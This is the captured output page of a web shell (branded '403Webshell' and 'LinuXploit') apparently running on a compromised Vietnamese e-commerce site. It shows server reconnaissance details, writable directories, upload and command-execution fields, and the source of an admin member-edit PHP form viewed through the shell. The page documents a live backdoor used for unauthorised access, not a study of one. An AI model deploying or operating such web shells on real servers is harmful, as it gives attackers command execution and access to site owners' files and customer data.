403Webshell
Server IP : 103.48.194.25  /  Your IP : 216.73.217.33
Web Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.33
System : Linux VMHostDefault 3.10.0-1160.42.2.el7.x86_64 #1 SMP Tue Sep 7 14:49:57 UTC 2021 x86_64
User : sieuthimay ( 1016)
PHP Version : 8.2.20
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/nguyenlieumyphamgiasi.vn/public_html/webadmin/views/member/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/nguyenlieumyphamgiasi.vn/public_html/webadmin/views/member/edit.php
    <?=form_open('member/edit/'.$rs->cusid);?>
    <input type="hidden" name="cusid" value="<?=$rs->cusid?>">
    <div class="title-admin">Thông tin đăng nhập</div>
    <table class="form">   
        <tr>
            <td class=" required label">Email đăng nhập</td>
            <td><input type="text" class="w300" name="cusmail" value="<?=$rs->cusmail?>"></td>
        </tr>         
        <tr>
            <td class=" required label">Mật khẩu</td>
            <td><input type="password" name="cuspass" class="w300" value=""></td>
        </tr>
        <tr>
            <td class=" required label">Nhắc lại mật khẩu</td>
            <td><input type="password" class="w300" name="re_cuspass"></td>
        </tr>
        <tr>
            <td class="label">Kích hoạt</td>
            <td><input type="checkbox" name="bl_active" value="1" <? echo ($rs->bl_active == 1)?'checked="checked"':'';?>></td>
        </tr>          
    </table>
    <div class="title-admin">Thông tin cá nhân</div>
    <table class="form">
        <tr>
            <td class="w150 required label">Họ và tên</td>
            <td><input type="text" name="cusname" class="w300" value="<?=$rs->cusname?>"></td>
        </tr>
        <tr>
            <td class="w150 required label">Điện thoại</td>
            <td><input type="text" name="cusphone" class="w300" value="<?=$rs->cusphone?>"></td>
        </tr>
        <tr>
            <td class="w150 required label">Địa chỉ</td>
            <td><input type="text" name="address" class="w300" value="<?=$rs->address?>"></td>
        </tr>          
        <tr>
            <td></td>
            <td class="footer"><input type="submit" name="bt_submit" class="capnhat"></td>
        </tr>                            
    </table>
    
    <?=form_close();?>

Youez - 2016 - github.com/yon3zu
LinuXploit